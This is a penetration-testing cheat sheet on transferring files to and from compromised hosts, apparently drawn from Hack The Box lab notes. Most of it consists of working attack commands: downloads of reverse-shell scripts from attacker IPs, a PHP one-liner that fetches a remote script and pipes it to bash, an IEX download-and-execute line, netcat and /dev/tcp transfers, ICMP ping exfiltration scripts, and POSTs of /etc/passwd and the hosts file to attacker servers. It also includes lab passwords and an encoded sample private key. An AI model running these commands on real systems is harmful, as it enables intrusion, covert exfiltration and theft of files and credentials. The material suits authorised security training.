> For the complete documentation index, see [llms.txt](https://docs.wehost.co.in/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.wehost.co.in/cybersecurity/transferring-files.md). # Transferring Files ### Web server * [Personal web server](/cybersecurity/personal-web-server.md) ``` wget http://10.10.14.1:800/linenum.sh ``` ``` curl http://10.10.14.1:8000/linenum.sh -o linenum.sh ``` #### Different methods **Linux** ``` wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py fetch 10.10.14.14:8000/shell.py #FreeBSD ``` **Windows** * [PowerShell Web Downloads](/cybersecurity/powershell-web-downloads.md) ### DNS * ### ICMP #### Attacker Box * python script ``` from scapy.all import * #This is ippsec receiver created in the HTB machine Mischief def process_packet(pkt): if pkt.haslayer(ICMP): if pkt[ICMP].type == 0: data = pkt[ICMP].load[-4:] #Read the 4bytes interesting print(f"{data.decode('utf-8')}", flush=True, end="") sniff(iface="tun0", prn=process_packet) ``` #### Victim **Linux** ``` # To exfiltrate the content of a file via pings you can do: xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line ; done #This will 4bytes per ping packet (you could probably increase this until 16) ``` **Windows** ``` # Define the path to the file and the attacker's IP address $filePath = "hello.txt" $attackerIP = "172.29.58.89" # Replace with the attacker's IP address # Read the file content and convert it to hex $fileContent = [System.IO.File]::ReadAllBytes($filePath) $hexString = -join ($fileContent | ForEach-Object { $_.ToString("x2") }) # Split the hex string into chunks of 8 characters (4 bytes) $chunks = $hexString -split "(.{8})" -ne "" # Loop through each chunk and send an ICMP ping with the chunk as the payload foreach ($chunk in $chunks) { # Convert the hex chunk to bytes $bytes = for ($i = 0; $i -lt $chunk.Length; $i += 2) { [Convert]::ToByte($chunk.Substring($i, 2), 16) } # Convert bytes to a string for the payload $payload = [System.Text.Encoding]::ASCII.GetString($bytes) # Send the ICMP ping with the payload $ping = New-Object System.Net.NetworkInformation.Ping $ping.Send($attackerIP, 1000, $bytes) | Out-Null # Optionally, add a small delay between pings Start-Sleep -Milliseconds 100 } ``` ### Python ```shell-session python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")' ``` ```shell-session python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")' ``` #### Uploading a File Using a Python One-liner ```shell-session python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("/etc/passwd","rb")})' ``` ### PHP **PHP Download with File\_get\_contents()** ```shell-session php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);' ``` **PHP Download with Fopen()** ```shell-session php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);' ``` **PHP Download a File and Pipe it to Bash** ```shell-session php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash ``` ### JavaScript * create a file called `wget.js` ```javascript var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); WinHttpReq.Send(); BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1; BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody); BinStream.SaveToFile(WScript.Arguments(1)); ``` **Download a File Using JavaScript and cscript.exe** ```cmd-session cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1 ``` ### VBScript * create a file called `wget.vbs` ```vbscript dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", WScript.Arguments.Item(0), False xHttp.Send with bStrm .type = 1 .open .write xHttp.responseBody .savetofile WScript.Arguments.Item(1), 2 end with ``` ```cmd-session cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1 ``` ### Other Languages **Ruby - Download a File** ```shell-session ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))' ``` **Perl - Download a File** ```shell-session perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");' ``` ### RDP **Mounting a Linux Folder Using rdesktop** ```shell-session rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files' ``` **Mounting a Linux Folder Using xfreerdp** ```shell-session xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer ``` ## Linux ### MD5 ```shell-session md5sum id_rsa ``` ```shell-session 4e301756a07ded0a2dd6953abf015278 id_rsa ``` ### SSHFS * If the victim has SSH, the attacker can mount a directory from the victim to the attacker. ``` sudo apt-get install sshfs sudo mkdir /mnt/sshfs sudo sshfs -o allow_other,default_permissions @:/ /mnt/sshfs/ ``` ### NC #### Linux ``` nc -lvnp 4444 > new_file # Recive file nc -vn 4444 < exfil_file # Send File ``` ```shell-session nc -q 0 192.168.49.128 8000 < SharpKatz.exe ``` * `-q 0` will tell Netcat to close the connection once it finishes #### Windows * Receive file ```shell-session ncat -l -p 8000 --recv-only > SharpKatz.exe ``` * send ```shell-session ncat --send-only 192.168.49.128 8000 < SharpKatz.exe ``` ### Compromised Machine Connecting to Netcat Using /dev/tcp to Receive the File ```shell-session victim@target:~$ cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe ``` **Note:** The same operation can be used to transfer files from the compromised host to our Pwnbox. ### SCP ``` scp linenum.sh user@remotehost:/tmp/linenum.sh ``` ### Encode and Decode Files #### Encode File ```shell-session cat id_rsa |base64 -w 0;echo ``` #### Decode File ``` echo "VXNlcm5hbWU6IGh0Yi1hYy0xMjUwNTM3ClBhc3N3b3JkOiB5eHhyekJFbwo=" | base64 -d ``` ### SMB Server * Create SMB server * [Create SMB server Linux (HACK)](app://obsidian.md/Create%20SMB%20server%20Linux%20\(HACK\)) ### FTP Server * [Create FTP Server Linux (HACK)](app://obsidian.md/Create%20FTP%20Server%20Linux%20\(HACK\)) ## Windows ### MD5 #### powershell ```powershell-session Get-FileHash C:\Users\Public\id_rsa -Algorithm md5 ``` #### Bat ``` certutil -hashfile temp.csv MD5 ``` ### PowerShell Base64 Encode & Decode #### Encode ```ruby $base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes($FileName)) ``` #### Decode ```powershell-session [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFJRUF6WjE0dzV1NU9laHR5SUJQSkg3Tm9Yai84YXNHRUcxcHpJbmtiN2hIMldRVGpMQWRYZE9kCno3YjJtd0tiSW56VmtTM1BUR3ZseGhDVkRRUmpBYzloQ3k1Q0duWnlLM3U2TjQ3RFhURFY0YUtkcXl0UTFUQXZZUHQwWm8KVWh2bEo5YUgxclgzVHUxM2FRWUNQTVdMc2JOV2tLWFJzSk11dTJONkJoRHVmQThhc0FBQUlRRGJXa3p3MjFwTThBQUFBSApjM05vTFhKellRQUFBSUVBeloxNHc1dTVPZWh0eUlCUEpIN05vWGovOGFzR0VHMXB6SW5rYjdoSDJXUVRqTEFkWGRPZHo3CmIybXdLYkluelZrUzNQVEd2bHhoQ1ZEUVJqQWM5aEN5NUNHblp5SzN1Nk40N0RYVERWNGFLZHF5dFExVEF2WVB0MFpvVWgKdmxKOWFIMXJYM1R1MTNhUVlDUE1XTHNiTldrS1hSc0pNdXUyTjZCaER1ZkE4YXNBQUFBREFRQUJBQUFBZ0NjQ28zRHBVSwpFdCtmWTZjY21JelZhL2NEL1hwTlRsRFZlaktkWVFib0ZPUFc5SjBxaUVoOEpyQWlxeXVlQTNNd1hTWFN3d3BHMkpvOTNPCllVSnNxQXB4NlBxbFF6K3hKNjZEdzl5RWF1RTA5OXpodEtpK0pvMkttVzJzVENkbm92Y3BiK3Q3S2lPcHlwYndFZ0dJWVkKZW9VT2hENVJyY2s5Q3J2TlFBem9BeEFBQUFRUUNGKzBtTXJraklXL09lc3lJRC9JQzJNRGNuNTI0S2NORUZ0NUk5b0ZJMApDcmdYNmNoSlNiVWJsVXFqVEx4NmIyblNmSlVWS3pUMXRCVk1tWEZ4Vit0K0FBQUFRUURzbGZwMnJzVTdtaVMyQnhXWjBNCjY2OEhxblp1SWc3WjVLUnFrK1hqWkdqbHVJMkxjalRKZEd4Z0VBanhuZEJqa0F0MExlOFphbUt5blV2aGU3ekkzL0FBQUEKUVFEZWZPSVFNZnQ0R1NtaERreWJtbG1IQXRkMUdYVitOQTRGNXQ0UExZYzZOYWRIc0JTWDJWN0liaFA1cS9yVm5tVHJRZApaUkVJTW84NzRMUkJrY0FqUlZBQUFBRkhCc1lXbHVkR1Y0ZEVCamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=")) ``` ### PowerShell Web Downloads * [PowerShell Web Downloads](app://obsidian.md/PowerShell%20Web%20Downloads) ### PowerShell Remoting * To create a PowerShell Remoting session on a remote computer, we will need * administrative access, * be a member of the `Remote Management Users` group, * or have explicit permissions for PowerShell Remoting in the session configuration. **From DC01 - Confirm WinRM port TCP 5985 is Open on DATABASE01.** ```powershell-session PS C:\htb> whoami htb\administrator PS C:\htb> hostname DC01 ``` ```powershell-session PS C:\htb> Test-NetConnection -ComputerName DATABASE01 -Port 5985 ``` ```powershell-session ComputerName : DATABASE01 RemoteAddress : 192.168.1.101 RemotePort : 5985 InterfaceAlias : Ethernet0 SourceAddress : 192.168.1.100 TcpTestSucceeded : True ``` **Create a PowerShell Remoting Session to DATABASE01** ```powershell-session $Session = New-PSSession -ComputerName DATABASE01 ``` **Copy samplefile.txt from our Localhost to the DATABASE01 Session** ```powershell-session Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\ ``` **Copy DATABASE.txt from DATABASE01 Session to our Localhost** ```powershell-session Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session ``` ### SMB Downloads #### Copy a File from the SMB Server ```cmd-session copy \\192.168.220.133\share\nc.exe ``` * **New versions of Windows block unauthenticated guest access** ```cmd-session You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network. ``` **Mount the SMB Server with Username and Password** ```cmd-session net use n: \\192.168.220.133\share /user:test test ``` ```cmd-session copy n:\nc.exe ``` ### SMB Uploads * Commonly enterprises don't allow the SMB protocol (TCP/445) out of their internal network because this can open them up to potential attacks. * * An alternative is to run SMB over HTTP with `WebDav`. `WebDAV` [(RFC 4918)](https://datatracker.ietf.org/doc/html/rfc4918) is an extension of HTTP * `WebDAV` protocol enables a webserver to behave like a fileserver, supporting collaborative content authoring. `WebDAV` can also use HTTPS. **Configuring WebDav Server** ```shell-session sudo pip3 install wsgidav cheroot ``` ```shell-session sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous ``` **Connecting to the Webdav Share** ```cmd-session dir \\192.168.49.128\DavWWWRoot ``` **Uploading Files using SMB** ```cmd-session copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\ ``` ### FTP Downloads **Transfering Files from an FTP Server Using PowerShell** ```powershell-session (New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt') ``` **Create a Command File for the FTP Client and Download the Target File** * this can be done by typing commands ```cmd-session echo open 192.168.49.128 > ftpcommand.txt echo USER anonymous >> ftpcommand.txt echo binary >> ftpcommand.txt echo GET file.txt >> ftpcommand.txt echo bye >> ftpcommand.txt ftp -v -n -s:ftpcommand.txt ``` ``` ftp> open 192.168.49.128 Log in with USER and PASS first. ftp> USER anonymous ftp> GET file.txt ftp> bye C:\htb>more file.txt This is a test file ``` ### PowerShell Web Uploads * [Linux Configured WebServer with Upload](/cybersecurity/linux-configured-webserver-with-upload.md) * use a PowerShell script [PSUpload.ps1](https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1) ```powershell-session IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') ``` ```powershell-session Import-Module .\PSUpload.ps1 ``` ```powershell-session Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts ``` #### PowerShell Base64 Web Upload * use Netcat to listen in on a port we specify and send the file as a `POST` request **Attacker** ```shell-session nc -lvnp 8000 ``` * get the following ```shell-session listening on [any] 8000 ... connect to [192.168.49.128] from (UNKNOWN) [192.168.49.129] 50923 POST / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Content-Type: application/x-www-form-urlencoded Host: 192.168.49.128:8000 Content-Length: 1820 Connection: Keep-Alive IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbXBsZSBIT1NUUyBmaWxlIHVzZWQgYnkgTWljcm9zb2Z0IFRDUC9JUCBmb3IgV2luZG93cy4NCiMNCiMgVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBtYXBwaW5ncyBvZiBJUCBhZGRyZXNzZXMgdG8gaG9zdCBuYW1lcy4gRWFjaA0KIyBlbnRyeSBzaG91bGQgYmUga2VwdCBvbiBhbiBpbmRpdmlkdWFsIGxpbmUuIFRoZSBJUCBhZGRyZXNzIHNob3VsZA0KIyBiZSBwbGFjZWQgaW4gdGhlIGZpcnN0IGNvbHVtbiBmb2xsb3dlZCBieSB0aGUgY29ycmVzcG9uZGluZyBob3N0IG5hbWUuDQojIFRoZSBJUCBhZGRyZXNzIGFuZCB0aGUgaG9zdCBuYW1lIHNob3VsZCBiZSBzZXBhcmF0ZWQgYnkgYXQgbGVhc3Qgb25lDQo ``` * decode the string ```shell-session echo | base64 -d -w 0 > hosts ``` **Victim** ```powershell-session $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte)) ``` ```powershell-session Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64 ``` ## Encryption while Transfer ### File Encryption on Windows * One of the simplest methods is the [Invoke-AESEncryption.ps1](https://www.powershellgallery.com/packages/DRTools/4.0.2.3/Content/Functions%5CInvoke-AESEncryption.ps1) **Invoke-AESEncryption.ps1** ```powershell-session .EXAMPLE Invoke-AESEncryption -Mode Encrypt -Key "p@ssw0rd" -Text "Secret Text" Description ----------- Encrypts the string "Secret Test" and outputs a Base64 encoded ciphertext. .EXAMPLE Invoke-AESEncryption -Mode Decrypt -Key "p@ssw0rd" -Text "LtxcRelxrDLrDB9rBD6JrfX/czKjZ2CUJkrg++kAMfs=" Description ----------- Decrypts the Base64 encoded string "LtxcRelxrDLrDB9rBD6JrfX/czKjZ2CUJkrg++kAMfs=" and outputs plain text. .EXAMPLE Invoke-AESEncryption -Mode Encrypt -Key "p@ssw0rd" -Path file.bin Description ----------- Encrypts the file "file.bin" and outputs an encrypted file "file.bin.aes" .EXAMPLE Invoke-AESEncryption -Mode Decrypt -Key "p@ssw0rd" -Path file.bin.aes Description ----------- Decrypts the file "file.bin.aes" and outputs an encrypted file "file.bin" #> function Invoke-AESEncryption { [CmdletBinding()] [OutputType([string])] Param ( [Parameter(Mandatory = $true)] [ValidateSet('Encrypt', 'Decrypt')] [String]$Mode, [Parameter(Mandatory = $true)] [String]$Key, [Parameter(Mandatory = $true, ParameterSetName = "CryptText")] [String]$Text, [Parameter(Mandatory = $true, ParameterSetName = "CryptFile")] [String]$Path ) Begin { $shaManaged = New-Object System.Security.Cryptography.SHA256Managed $aesManaged = New-Object System.Security.Cryptography.AesManaged $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros $aesManaged.BlockSize = 128 $aesManaged.KeySize = 256 } Process { $aesManaged.Key = $shaManaged.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Key)) switch ($Mode) { 'Encrypt' { if ($Text) {$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($Text)} if ($Path) { $File = Get-Item -Path $Path -ErrorAction SilentlyContinue if (!$File.FullName) { Write-Error -Message "File not found!" break } $plainBytes = [System.IO.File]::ReadAllBytes($File.FullName) $outPath = $File.FullName + ".aes" } $encryptor = $aesManaged.CreateEncryptor() $encryptedBytes = $encryptor.TransformFinalBlock($plainBytes, 0, $plainBytes.Length) $encryptedBytes = $aesManaged.IV + $encryptedBytes $aesManaged.Dispose() if ($Text) {return [System.Convert]::ToBase64String($encryptedBytes)} if ($Path) { [System.IO.File]::WriteAllBytes($outPath, $encryptedBytes) (Get-Item $outPath).LastWriteTime = $File.LastWriteTime return "File encrypted to $outPath" } } 'Decrypt' { if ($Text) {$cipherBytes = [System.Convert]::FromBase64String($Text)} if ($Path) { $File = Get-Item -Path $Path -ErrorAction SilentlyContinue if (!$File.FullName) { Write-Error -Message "File not found!" break } $cipherBytes = [System.IO.File]::ReadAllBytes($File.FullName) $outPath = $File.FullName -replace ".aes" } $aesManaged.IV = $cipherBytes[0..15] $decryptor = $aesManaged.CreateDecryptor() $decryptedBytes = $decryptor.TransformFinalBlock($cipherBytes, 16, $cipherBytes.Length - 16) $aesManaged.Dispose() if ($Text) {return [System.Text.Encoding]::UTF8.GetString($decryptedBytes).Trim([char]0)} if ($Path) { [System.IO.File]::WriteAllBytes($outPath, $decryptedBytes) (Get-Item $outPath).LastWriteTime = $File.LastWriteTime return "File decrypted to $outPath" } } } } End { $shaManaged.Dispose() $aesManaged.Dispose() } } ``` **Import Module Invoke-AESEncryption.ps1** ```powershell-session Import-Module .\Invoke-AESEncryption.ps1 ``` **File Encryption Example** ```powershell-session Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\scan-results.txt ``` ```powershell-session File encrypted to C:\htb\scan-results.txt.aes PS C:\htb> ls Directory: C:\htb Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 11/18/2020 12:17 AM 9734 Invoke-AESEncryption.ps1 -a---- 11/18/2020 12:19 PM 1724 scan-results.txt -a---- 11/18/2020 12:20 PM 3448 scan-results.txt.aes ``` ### File Encryption on Linux **Encrypting /etc/passwd with openssl** ```shell-session openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc ``` ```shell-session enter aes-256-cbc encryption password: Verifying - enter aes-256-cbc encryption password: ``` **Decrypt passwd.enc with openssl** ```shell-session openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd ``` ```shell-session enter aes-256-cbc decryption password: ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.wehost.co.in/cybersecurity/transferring-files.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.